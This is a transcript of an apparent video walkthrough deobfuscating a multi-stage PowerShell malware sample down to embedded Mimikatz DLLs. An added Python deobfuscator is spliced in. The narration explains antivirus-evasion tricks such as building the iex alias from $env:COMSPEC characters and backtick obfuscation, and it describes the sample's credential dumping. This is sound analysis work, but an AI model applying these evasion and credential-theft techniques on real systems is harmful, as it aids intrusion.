Yeah, 3004. But then I had this epiphany and I realized the entire PowerShell script itself is being used as a format string. All of the different chunks and all the different portions that we are randomly seeing, where you're starting to add in parameters and create variables, but then suddenly have a random string with a comma and then base64 in the middle: that's impossible in PowerShell syntax. That's literally not how it will tokenize and run. Then I realized this is a giant puzzle where they're reorganizing, reordering, and rearranging all the pieces of the script and then using that as their final payload. So that kind of blew my mind, and I thought it was really kind of neat. So at the very, very top, here's a crap ton of numbers. It's all passed with -f to create a format string, and the entire PowerShell script is a format string. Isn't that so cool? Obviously horrific and malicious and nefarious and bad, but so cool.

Now here's the kicker, right? Of course, this is all going to end up being a string. Does it get executed? Where, in this giant glob of three megabytes of PowerShell creating, what is that, how many lines is that, 10,269 lines of code, where is the iex? Where is the Invoke-Expression? Is it going to very dangerously throw it in there somewhere and I have to hunt it down? We'll know, because all this string is going to be joined together in place, rearranged and reordered like those puzzle pieces, and then at the very, very bottom, check this out: the exact same kind of tradecraft and style that you just saw previously, where it's piped into an ampersand to run it with $env:COMSPEC, indexing that out, joining it all together. I'll show you this. Let me take this real quick.
Take that syntax, hop on over to my Windows PowerShell here, paste that in: iex. Again, just another technique to index out individual letters from a known variable that will be constant and static on every single target, every single victim. $env:COMSPEC should typically always be cmd.exe. Take index 4, take index 15, take index 25, slap that all together as one string, and now you have crafted the alias to run Invoke-Expression and you're spooky, scary, evading antivirus and detection. So now, so far in this video, we've seen two ways to do that, and obviously there are many, many more. Just grab any kind of static, known environment variable on the target, which should be the same across all targets, and then cram it together. Smart, smarticle.

So with that said, now we know what to nerf. Now we know what to defang and remove from this. So if I take this stage four and just kill that iex at the very, very end, now I can safely run that stage four, and rearrange it, reorganize it, re-orchestrate what this script would originally look like, and it will have the original string, the original script. So let me smartly do that with PowerShell this time. I'll run PowerShell on stage four and we'll redirect that out to stage five. Jeez. Let it go. Cool. All right, so now let's see if that exists and is relatively sane. And it is. This is much more readable and makes much more sense than the previous one, and you can see some other well-known tricks where you just throw backticks in for the PowerShell syntax, because the backtick is the escape character in PowerShell. So normally we use a backslash n to create a newline in other programming languages or scripting languages, or backslash t to create a tab. So rather than the backslash, PowerShell uses a backtick. But not only is PowerShell case insensitive, or it doesn't care about the capitalization of lowercase and uppercase letters...
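The two tricks walked through above (a script scrambled into a -f format string, and the iex alias assembled from characters of $env:COMSPEC) are the kind of thing an analyst wants to undo mechanically rather than by hand. The following is an added example, not code from the video or from John's gist: a small Python deobfuscator that re-applies the .NET composite format rules to a 'template' -f 'args' expression and resolves $env:NAME[i,j,k] -join '' against assumed-constant variable values. The KNOWN_ENV table, the OBFUSCATED sample line, and every function name are constructed for this example; only COMSPEC and the indexes 4, 15, 25 come from the video.

```python
import re

# Assumed constant environment-variable values that the alias-building trick relies on
# being identical on every Windows host (assumption for this added example; the video
# only discusses COMSPEC, whose default is the cmd.exe path below).
KNOWN_ENV = {"COMSPEC": r"C:\Windows\system32\cmd.exe"}

# One {N} slot of a .NET composite format string, with optional ",alignment" and
# ":format" parts, plus the {{ and }} literal escapes.
_SLOT = re.compile(r"\{\{|\}\}|\{(\d+)(?:,[-+]?\d+)?(?::[^}]*)?\}")

# 'template' -f 'arg0','arg1',...  (single-quoted PowerShell literals; '' is an escaped ')
_FORMAT_EXPR = re.compile(r"'((?:[^']|'')*)'\s*-f\s*((?:'(?:[^']|'')*'\s*,?\s*)+)")

# $env:NAME[i,j,k] -join ''  (pick characters out of a known variable, glue them together)
_ENV_INDEX = re.compile(r"\$env:(\w+)\[([\d,\s]+)\]\s*-join\s*''", re.IGNORECASE)


def resolve_format(template, args):
    """Mimic .NET String.Format for the {N} slots that PowerShell's -f operator uses."""
    def fill(m):
        if m.group(0) == "{{":
            return "{"
        if m.group(0) == "}}":
            return "}"
        idx = int(m.group(1))
        if idx >= len(args):
            # The same failure the video hit when the argument list was cut short.
            raise IndexError("Index (zero based) must be greater than or equal to zero "
                             "and less than the size of the argument list.")
        return args[idx]
    return _SLOT.sub(fill, template)


def _unquote(literal):
    return literal.replace("''", "'")


def expand_format_strings(text):
    """Replace every 'template' -f 'a','b',... with the single-quoted string it builds."""
    def rebuild(m):
        template = _unquote(m.group(1))
        args = [_unquote(a) for a in re.findall(r"'((?:[^']|'')*)'", m.group(2))]
        return "'" + resolve_format(template, args).replace("'", "''") + "'"
    return _FORMAT_EXPR.sub(rebuild, text)


def resolve_env_indexes(text, env=KNOWN_ENV):
    """Return every $env:NAME[...] -join '' expression with the string it resolves to."""
    hits = []
    for m in _ENV_INDEX.finditer(text):
        value = env.get(m.group(1).upper())
        if value is not None:
            hits.append((m.group(0), "".join(value[int(i)] for i in m.group(2).split(","))))
    return hits


def expand_env_indexes(text, env=KNOWN_ENV):
    """Replace each resolvable $env:NAME[...] -join '' with the literal it builds."""
    out = text
    for expr, literal in resolve_env_indexes(text, env):
        out = out.replace(expr, "'" + literal + "'")
    return out


def deobfuscate(text, env=KNOWN_ENV):
    """Env-index expansion first, then format-string expansion, so nested uses resolve."""
    return expand_format_strings(expand_env_indexes(text, env))


# Constructed sample in the style the video describes: a command-name alias assembled from
# characters of $env:COMSPEC, and a body scrambled into a -f format string. Not the real sample.
OBFUSCATED = """& ($env:COMSPEC[4,15,25] -join '') ('{3}{0}{2}{1}' -f 'rite-Hos','ello"','t "h','W')"""

if __name__ == "__main__":
    print(resolve_env_indexes(OBFUSCATED))  # [("$env:COMSPEC[4,15,25] -join ''", 'iex')]
    print(deobfuscate(OBFUSCATED))           # & ('iex') ('Write-Host "hello"')
```

Because the format string is applied statically, the script never has to be executed to recover its body, which is the point when the alternative is pasting three megabytes of hostile PowerShell into an interpreter. A real sample would also need the numeric {N} slots at the top of the script reconciled with an argument list of several thousand entries; resolve_format already handles any count, and raises the same "Index (zero based)" error the video shows when the list is truncated.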
...so you can make your messages look like straight up memes, like the SpongeBob meme. And you can just arbitrarily throw in backticks wherever you want, because if it's not a valid escape character, PowerShell's like, "Oh, sure, I know what you mean, you just want a regular 'a' character." But now you're again evading antivirus or classic, formulaic, stupid signature detection. Just tricks, just stuff that bad guys are using, and we do too, right, as red teamers, pen testers, threat emulation. Anyway, you can see all of these functions now as they originally were, some other techniques to replace information, to get, looks like, shares, getting SMB packets, like carving them out by hand or crafting them all, which is kind of neat. But again, I'm thinking these are part of other C2 frameworks that have all been crammed in together. Again, now if we were to try and look for all the functions here, and we can do that, I won't actually pour through all of this, because I think you get the gist, and that those techniques they're using, replacing the backticks, etc., etc. But a lot of this is actually kind of decently readable, you know. If we wanted to, we could remove all those backticks, but some of them might actually be in different places. But the replacements, those techniques, are present. How far are we going, how many lines do we need to go in here? Oh, here's a good one, though, before I go too far.
I did see this: us getting versions, right, checking for the operating system, etc., etc. And as you scroll down you do see this giant chunk in yellow here, and now we have inline C# code, because PowerShell can do that, right? So PowerShell can create a multi-line string with that at symbol, and it will have a PingCastle scanner's namespace, create a specific class where we have a scan function or functionality here, where it'll do some TcpClient and it'll try and connect to the argument that's passed in on port 445, good old SMB, right? NetworkStream, etc., reading out responses, trying to determine how it responds with potential named pipes, etc. And I'm just going through this as a 10,000-foot view, kind of scrolling by, but you can see the functionality there. I'm more impressed, and I think it's more cool, that you are seeing that inline C# be able to be brought in and compiled on the fly. They're doing that with Add-Type, and now Add-Type does boil down to using csc.exe, the command-line C# compiler, same thing with MSBuild, I believe, so they all end up writing to disk momentarily, and I think either I've showcased that in a previous video or I have footage that I still need to upload for showcasing that. Anyway, that gives us the functionality, and I do see some shellcode also being included in here. This is all from base64, so we could go ahead and try and spit that out, but it is non-printable characters, so I'm assuming it's shellcode and we might need to do some scdbg or something. Oh, actually, there's some stuff in here. Let's run strings on that. Scrolling back, scrolling back. Hmm, cmd, slash e, netsh.exe to take the firewall, add some opening ports, their own DNS that they might end up using, portproxy. Isn't that port... is that port binding?
Yeah. If you haven't seen it, I think that's a neat technique, where you can redirect one port to another one, even locally. So there's a portproxy syntax. Scheduled tasks, of course. What do we have, do we have winit in there? No, no, no, it's called sync. And every 40 minutes we'll have a scheduled task run that will sync. And what is that PowerShell syntax? I don't think I've actually gone down this road yet. Is that different from that one down there? I don't think it is. Let's try and echo that out, pipe it to base64. Nope. It's our good friend, pasted online. With 32... oh, oh, oh, wait a second, 32? What is this other one, the one at the very, very bottom? Is that going to be like 64? Is it checking the architecture? Oh, it might be. Let's try and get that in there. Oh, sorry, echo. And I did just grab the bottom one, right: base64 -d, 64. All about that architecture, all about that architecture. Cool, cool, cool. Okay.

Actually, let's take the original one and redirect that out to, like, shellcode. How about that? What is that? It's just data. We already ran strings on it, so I think that genuinely is shellcode. It's not going to be like its own binary or anything. Let's get back to stage five. Now we have a local scan function, where it looks like it'll take in IP addresses and genuinely scan them, avoiding, or is it including, local IP addresses? API IP, I'm assuming that's going to get, yep, their public IP address. BeginConnect, etc., etc. PowerDump, is that a thing? What is that? LoadApi, this looks like the classic syntax to dynamically load in an assembly. PowerDump, is that a thing? PowerDump, Empire. Imagine that, just as we said. Okay. Pulling in other Win32 APIs to get more power, more functionality, pulling NTLM passwords, SID to key, string to key. I don't want to scroll through this forever, because obviously this is a very, very long file and we're already, I think, an hour into the video recording.
So we'll get registry keys, though. I'm sure you might already, like, look, if we are seeing just the functionality of Empire all smashed into one PowerShell script, then that makes sense. Dump hashes: here's the original source code for that. Plenty of stuff here, SAM, SAM, domains, Invoke my pass for dumb bread going bots, and custom commands, parameters. We could drill into that a little bit, see if that's known, more syntax for Itanium. I don't know what... oh, those look like just internal stuff for DLLs. Maybe we're loading in other functions. Mmm, there's a lot. There's a lot right there. Let's cruise through that, because I want to get to the finale, the good stuff here. I'm going to page down through a lot of these because this is getting to be kind of huge. Cannot subtract subarray, add integers: is it just data conversion stuff? Yeah, convert, convert. Test memory range, see if it's valid memory, write bytes to memory, get delegate type. Aha, the classic enable SeDebugPrivilege. A lot of good spooky functionality here. "Windows Vista or 7 detected, using a different API call." Here they're keeping track of what target the victim is, what operating system that is.

We're getting to the good stuff. I'm getting slowly, slowly, slowly to something more interesting. I know there's one last layer of the onion that I want to get us to, and then we can call it at the end of the video, but I hope you had fun, hope you had fun cruising through all this with me. Get command line functionality. No, VirtualProtect, Invoke. Is it rewriting, is it changing some stuff in memory? Random function names. So if you're curious, of course, I know I'm breezing through this, this is all on my GitHub gist, so you can take a look at that one if you'd like. There's obviously a lot to unravel here, but this is kind of where we get the good stuff: in function main here, you'll end up checking for 64-bit potentially. I know I didn't bother to de-obfuscate some of the stuff, but there's others in here. And here we go.
I think... no. Where are these bytes coming from? Are these defined, these base64 ones? I do want to showcase them, but I don't know if I already scrolled through them. If anything, I can turn off word wrap and they will... turn on word wrap and then they will be extremely visible. But oh, look at this, look at this. These are Mimikatz commands. Is that the LSA crypto? Yeah, yeah, yeah. Oh, here they are, here are these bytes. So, checking out these bytes here: this is all base64, of course, right? So we can echo and decode all that. So let me echo this one. Oh, how's my terminal doing? Okay, it figured it out. base64 -d, and where did that one... what was that one called, bytes32? Or DesBytes? DesBytes we'll call it. And let's check out what that is. That is an executable, 64-bit. Okay, let's get this 32 one, Bytes32. Let's echo all of that out to a base64 -d, my face is in the way, just trust that I am redirecting that out to... what was that called, just 32? We'll call it 32. Fair enough. Let's cat that 32, or no, no, let's run file on our 32. And that is 32-bit, right? So our DesBytes is 64-bit and that 32 is 32-bit. Makes sense.

Now running strings on, let's go for the 64-bit one, you can take a gander, because unfortunately, right, unfortunately, these are not .NET compiled ones, so I wouldn't be able to crack this open in dnSpy or ILSpy and kind of get an understanding for it. We can throw it into Ghidra, and maybe that's worth a try. I just installed Ghidra over on the Windows side, but I don't know how far I'll be able to drive into that. At this point, though, we've reached the end of the tunnel where we have a more solid binary, so we can kick that over to VirusTotal, or take it over to ReversingLabs or Joe Sandbox analysis or Any.Run, whatever, whatever, whatever. We can see if that lights up any antivirus scanners. Now that we know these are DLLs, though...
Let's move 32 to 32.dll and let's move the DesBytes to 64.dll. Let me do a quick strings on them before I continue with the performance here. Obviously a lot of the default boilerplate nonsense stuff. Let's try and trim that down by using strings -n, like 8 or something, and let's see if that will kind of minimize the noise. No, not really, but we should hopefully at least have a shorter list here now. So we see encrypt, references, DLLs, messages that are kind of included, particularly in the compilation here. Of course the days of the week, as we always see. I don't know what these really are: on, off, all, size, true, extra, full, natural, left-to-right, full, inner, across. I thought that was kind of spooky. I do see SQLite references, though, and I also see these potential data names or field names for stuff that will be stored in SQLite, like these NTLM passwords or LM password history, etc., etc., timestamps. A lot of potential API function calls. And obviously we're just looking at strings, right? So it's not going to be super duper telling. We'll fire it open in Ghidra in just a moment, but after we kick it to VirusTotal and stuff. And then you can see straight up SQL syntax: CREATE TABLE, AUTOINCREMENT, DELETE FROM, UPDATE, table names. It's definitely using a SQLite database for keeping track of stuff. Random blob, zero blob, etc., etc., etc. Too many arguments. Is there something more damning here? Oh, here we go. Here we end up checking out some cryptography stuff: BCrypt, NCrypt, import key. And of course a good old Mimikatz string: "Hello, welcome, thank, I'm glad you could make it to the party." Mimikatz. System flags, LSA, that must be something for getting, pouring things out of LSASS maybe, and of course BCrypt, NCrypt, all these other functions. But look at this, look at this, look at this: powerkatz.dll and a reference to Power... oh, moving my face again.
I get it all the time. Move. Reference to PowerShell reflective Mimikatz. We're looking at strings, mind you, again, so, hey, this isn't a smoking gun or anything. But now that we have a little bit more functionality, or an idea as to what this thing might be doing, let's kick it off over to our good friend VirusTotal and see what we've got. Here we go, let's go to VirusTotal, virustotal.com. Once the internet loads, I'm waiting on the entire internet to come back for me here. There we go. Let's upload a file. We had what? My x was the directory that we called it, so 32bit.dll. Let's fire that one up, and 52 of 70 engines detect this one. They're saying, yo, Mimikatz, Mimikatz, malware, malware, hack tool, Mimikatz, Mimikatz, Mimikatz, Mimikatz, Mimikatz. Dude, it's bloody. There is some carnage on this VirusTotal page right here. What does the community say? Yep, reflective Mimikatz, reflective Mimikatz. This is the same person over and over. Let's try and give it that 64-bit DLL. 54 out of 70 engines, nice. Mimikatz, Mimikatz, Mimikatz, Mimikatz. It could be a wrap, ladies and gentlemen. Mimikatz, wrap. Once again, Mimikatz, reflective, all throughout the community, Florian again. Sweet, dude.

So it's bad. I think we can come to that conclusion, from what I understand, and let's see if we can actually throw it into Ghidra. I'll try and see if I can upload this. http.server? Yeah. What is my IP address real quick? Let's get an IP, a... ah, I have multiple screens. What am I right now locally? I am .17. Can I reach that from my Windows VM? Port 8000, please, please, please. Yeah. All right, cool, cool, cool. Let's download the 64-bit. Let's see if Chrome is cool with it. All right, nope, I spoke too soon. Chrome doesn't like it, and Defender's probably going to whine on this thing too. Obviously, they'll be like, "No, it's Mimikatz. What are you doing, John?" Let's see if we can get him to shut up real quick.
Manage settings, please stop, Defender. We have to... "Virus protection is turned off. You might want to turn that back on, bucko." How did you know? Let's copy this and try and wget it down. How about that? Let's get to the old desktop here. Let's wget, because that's an alias in PowerShell, -OutFile 64.dll. Fingers crossed. Please. What's happening? PowerShell is just hung up on the phone, dude. I have no output. Do I need to have that earlier, like -UseBasicParsing? Should be after. -UseBasicParsing. Come on. Let's do a little Invoke-WebRequest. Invoke-WebRequest, slap. What's happening? I'm going to have to pause the video because I'm just crumbling at a simple wget command, everybody. Give me a moment. Okay, I don't really know what happened, not going to lie. It just didn't want to come back. So, 32, 32. Oh, sorry, my face is in the way. I just downloaded the files here. They are on my desktop.

Let's see if we can get Ghidra to open them. I am running Ghidra within Windows, because Ghidra, seemingly, to open a Windows file within Linux, it doesn't have the file system provider to kind of know what it's doing, and I understand. You know, sometimes I don't know how to speak another language either. But I don't know, truthfully, I have never done this. I've never tried to run Ghidra on Windows, so I have no idea what's going to end up going through. It's pretty new. Project, see if we can get anything here, and non-shared project, we'll call it ghidra in lowercase. Totally cool. And then let's Ctrl-I, before the internet yells at me that I get that wrong, to try and explore some of these. Ctrl-I to open up a binary. Once again, no file system provider. If I drag it in, let's see if I figure that one out now. Yep, okay, cool. So I have seen that error come up before recently, and someone commented on the video, the last video where I was trying to use Ghidra, and they're like, "No, no, no, John, John, no file system provider."
It's just some strange thing that happens. If you can drag the file in, it does behave. So forgive me on that. I think I commented on the video, like, please forgive me, internet, I'm truly sorry. But let's see if Ghidra can pull it together on this one. Taking its sweet time, pause the video real quick. Okay, it looks good. Pulled it in. See if we can analyze it. Again, I don't know where this is going to go, so this is me operating at the edge of my understanding. See if we can analyze it. But I mean, if it's just going to end up being Mimikatz, at the very least we know, hey, it can try and dump passwords and things and credentials out of memory. I don't know exactly what this will look like, but we could pour through it. There we go, entry. And it tries to run, based off the parameters here, if a parameter is one it'll call this thing, which calls other functions, and this is kind of hard to see. I know that I would need to increase the font and everything here, but it's all going to end up being stripped. And all of the VirusTotal stuff that we see does indicate that, yo, this is... and it's not like you can just scan it. It's not like you can just open a thing up in VirusTotal and say, oh, it's bad, it says it's bad, or it says it's good, I'm going to totally ignore it. You've got to take that with a grain of salt. Obviously, exploring through it in Ghidra is something that you can and should do, even if it's just clicking around trying to see what they do, like all the functions here. Like if we were to look for, hey, PowerShell reflective Mimikatz, there it goes. It's a function. What else do you do? Check out the command line arguments, try and allocate memory. What is this guy, run thing?
Explore it. Fastcalls here. Truthfully, I'm out of my element when we get to this point. I had a lot more fun with the PowerShell, and when we get to the point where it's like, yo, we've got the binary and this lights up on some community threat intelligence stuff between VirusTotal and all, I think that's enough to call it quits here. But opening up the 32-bit and opening up the 64-bit files in Ghidra, or examining them, does kind of offer the insight: like, look, these seem to be both 64-bit and 32-bit Mimikatz. So those could be going to grab credentials and more information. That has been one route in what we've been, or I've been, uncovering, kind of pouring through, exploring, and you can see some of my other work if you Google around. But all of those other stages, as we pour through them, are available again through my GitHub gist. And this has all been obviously released before, so I don't want to be letting the cat out of the bag on anything or making anyone upset. Like, it's okay, we're all trying to get better, we're all trying to get smarter and understand the post-exploitation that might go on or what's happening next. So I've seen other occurrences where folks are reporting, like, hey, they're running net.exe commands to add and remove administrators in the Exchange group, right? Obviously in the Microsoft Exchange incident we're seeing registry commands like reg query, reg dump, reg save to pull down SAM databases or other information. We're seeing ProcDump. Obviously now we're seeing Mimikatz to gather information, passwords, etc., etc. It's still coming through, it's still developing, but we need to all come together, right?
And I say this all too often, that it takes a village. You know, we're all trying to share this intelligence as we're gathering it, so please don't hesitate to offer or join in the fight, join in the fun, if there are any IOCs that you might want to share or other things we can examine and analyze. But I have repeatedly wanted to emphasize my disclaimer, that I'm not a thousand percent positive and I don't guarantee any of this, but I wanted to showcase it and drag us through some of that code because I thought it was cool, kind of neat. I will say, none of this goes to say, none of this goes to show, or none of this says or means, like, oh, this is Hafnium. No, I can't say that, we can't say that. We can't say it is one specific actor, or multiple, or that it's being re-exploited. We just don't know. I don't know, and I'm not going to pretend like I do. I don't want to be in speculation corner, especially when folks are like, is this country X, Y, Z, is this attribution? Look, it's bad, and we've got to get the bad stuff away no matter who made it or what it is or where it came from. Like, know, understand that it's evil, and then stop the evil.

So that's enough of my rant. That's enough of this video, but thank you so much for watching, everybody. I think we can tune out now. I really, really hope you enjoyed this video. I really hope you had some fun with some of the PowerShell stuff we were carving through. I hope it had some real-world application to it, and that, yes, this is an ongoing, growing story. There's more to come, and again, maybe my analysis is totally wrong, but it was kind of fun to unravel and pour through those PowerShell onions there, when we're getting to stage five to get into stage six with this Mimikatz DLL that's loaded in. Wow. There's more to do, though. So we're not over yet. It's not over yet.
So thanks so much for watching, everybody. If you enjoyed this video, please do press that like button, please leave a comment below, it helps the YouTube algorithm engagement stuff. So if you're willing to, please subscribe for more videos like this. I have a lot in the cannon, and people have been sending me some great malware samples, so please do, please, please, please keep it up. Please do send along any malware samples that you are interested in, or kind of want me to take a look at. There's a link, or there's my email, in the description, so please keep sending them along. It's very cool, very fun. We can keep growing this thing.

So before I go, before I forget, I do want to mention a quick little notion here. Yo, NahamCon. NahamCon is coming up, NahamCon is happening this Friday, and I want to throw in this pitch before the end of the video, because I should have done it at the beginning, but then no one would actually watch the video. Look, if you haven't registered for NahamCon, I'm hosting the game, my guys, my team, my friends, we're all putting this game on. We have over like 70 challenges, like a ton of challenges for this weekend competition, 48 hours, this coming Friday to this coming Saturday. We have some fantastic sponsors that are offering some sweet, sweet prizes. INE has thrown in some incredible stuff. I think Red Bull is trying to get everyone drinks. It's so, so awesome. And we'll be showcasing some other neat challenges. This is all new stuff. We're going to have a ton of fun. So please, please, please register, come play, come hang out: ctf.nahamcon.com. We'll see you this coming Friday. We're going to have a blast, and you'll see some challenges a lot like this, a lot like this, neat malware analysis stuff. So, okay, that is the end of the video, everybody. Thanks so much for tolerating me. I hope you enjoyed this one. I love you. I'll see you in the next one, and keep on the fight.
We're all here to learn and keep growing. So share it with the community. Thanks, everybody. I love you. Take care. Thank you.